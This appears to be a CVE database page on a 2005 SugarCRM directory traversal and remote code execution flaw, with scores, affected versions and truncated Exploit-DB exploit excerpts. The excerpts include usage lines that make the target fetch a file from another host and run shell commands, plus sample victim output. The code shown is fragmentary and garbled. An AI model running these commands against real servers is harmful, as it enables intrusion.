CVE-2005-4086
published 2005-12-08CVE-2005-4086: Directory traversal vulnerability in acceptDecline.php in Sugar Suite Open Source Customer Relationship Management (SugarCRM) 4.0 beta and earlier allows…
PriorityP433medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
7.33%
93.6th percentile
Directory traversal vulnerability in acceptDecline.php in Sugar Suite Open Source Customer Relationship Management (SugarCRM) 4.0 beta and earlier allows remote attackers to include arbitrary local files via ".." sequences in the beanFiles array parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sugarcrm | sugar_suite | — | — |
| sugarcrm | sugar_suite | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SugarSuite Open Source 4.0beta - Remote Code Execution (2)
exploitdb·2005-12-08
CVE-2005-4086 SugarSuite Open Source 4.0beta - Remote Code Execution (2)
SugarSuite Open Source 4.0beta - Remote Code Execution (2)
---
/*
gcc -o sugar sugar.c
Usage ./sugar [host] [/path/] [site] [cmd]
Sugar Suite Open Source ");
fclose($fp);
?>
./sugar www.victim.com /CRM35/ http://othersite.com/file.txt ls%20-al
HTTP/1.1 200 OK
Date: Thu, 08 Dec 2005 12:35:33 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) PHP/4.3.10 mod_perl/1.27
X-Powered-By: PHP/4.3.10
Connection: close
Content-Type: text/html
Linux victim.com 2.4.9-e.57smp #1 SMP Thu Dec 2 20:51:12 EST 2004 i686 unknown
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define HTTP_PORT 80
#define DATA "\ncompile gcc -o sugar sugar.c\n\nexample ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%%20-a;\n\nPut this in your file.txt\n\n\");\nfclose($fp
Exploit-DB
SugarSuite Open Source 4.0beta - Remote Code Execution (1)
exploitdb·2005-12-07
CVE-2005-4087 SugarSuite Open Source 4.0beta - Remote Code Execution (1)
SugarSuite Open Source 4.0beta - Remote Code Execution (1)
---
Sugar Suite Open Source
body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-s
No writeups or analysis indexed.
http://rgod.altervista.org/sugar_suite_40beta.htmlhttp://secunia.com/advisories/17948http://securitytracker.com/id?1015322http://www.securityfocus.com/archive/1/418840http://www.securityfocus.com/bid/15760http://www.vupen.com/english/advisories/2005/2800http://rgod.altervista.org/sugar_suite_40beta.htmlhttp://secunia.com/advisories/17948http://securitytracker.com/id?1015322http://www.securityfocus.com/archive/1/418840http://www.securityfocus.com/bid/15760http://www.vupen.com/english/advisories/2005/2800
2005-12-08
Published